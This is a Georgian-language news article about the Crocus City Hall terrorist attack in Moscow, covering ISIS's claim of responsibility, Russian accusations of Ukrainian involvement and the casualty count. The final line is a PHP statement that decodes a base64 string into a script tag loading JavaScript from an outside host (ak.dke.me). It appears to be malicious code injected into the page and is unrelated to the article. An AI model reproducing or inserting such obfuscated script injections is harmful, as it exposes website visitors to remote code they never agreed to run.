celsiusi
ავერსი საქკაბელი

 პარასკევს ღამით მოსკოვში, საკონცერტო დარბაზზე განხორციელებულ ტერორისტულ თავდასხმაზე პასუხისმგებლობა ისლამისტურ ექსტრემისტულმა ჯგუფმა, ISIS-მა აიღო. უცხოური მედიის ცნობით, რუსეთი ტერაქტში უკრაინულ კავშირებს ეძებდა, მიუხედავად იმისა, რომ უკრაინის პრეზიდენტის მრჩეველმა, მიხაილ პოდოლიაკიმ, თავდასხმაში კიევის მონაწილეობა უარყო - ამის შესახებ Reuters-ი იტყობინება.

“ეფესბის” განცხადებით დაკავებული “ოთხივე ტერორისტი” უკრაინის საზღვრისკენ გადაადგილდებოდა და თითოეულ მათგანს კავშირი ჰქონდა უკრაინასთან.

მომხდარს რუსეთის საგარეო საქმეთა სამინისტროს ოფიციალური წარმომადგენელი, მარია ზახაროვა, საკუთარ Telegram არხზე გამოეხმაურა.

“უკვე ვიცით რომელ ქვეყანაში აპირებდნენ ტერორისტები სამართალდამცველებისგან დამალვას - უკრაინაში”, - წერს ზახაროვა.

შეგახსენებთ, რომ გასულ ღამეს მოსკოვში, “კროკუს სითი ჰოლში, ბოლო 20 წლის განმავლობაში, ქვეყნისათვის ყველაზე მასშტაბური ტერაქტი მოხდა. რუსული მედიის ბოლო ინფორმაციით, გარდაცვლილთა რაოდენობა 115-ს აღწევს. დაკავებულია 11 პირი, მათ შორის თავდასხმის 4 უშუალო მონაწილე დააკავეს.

158
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");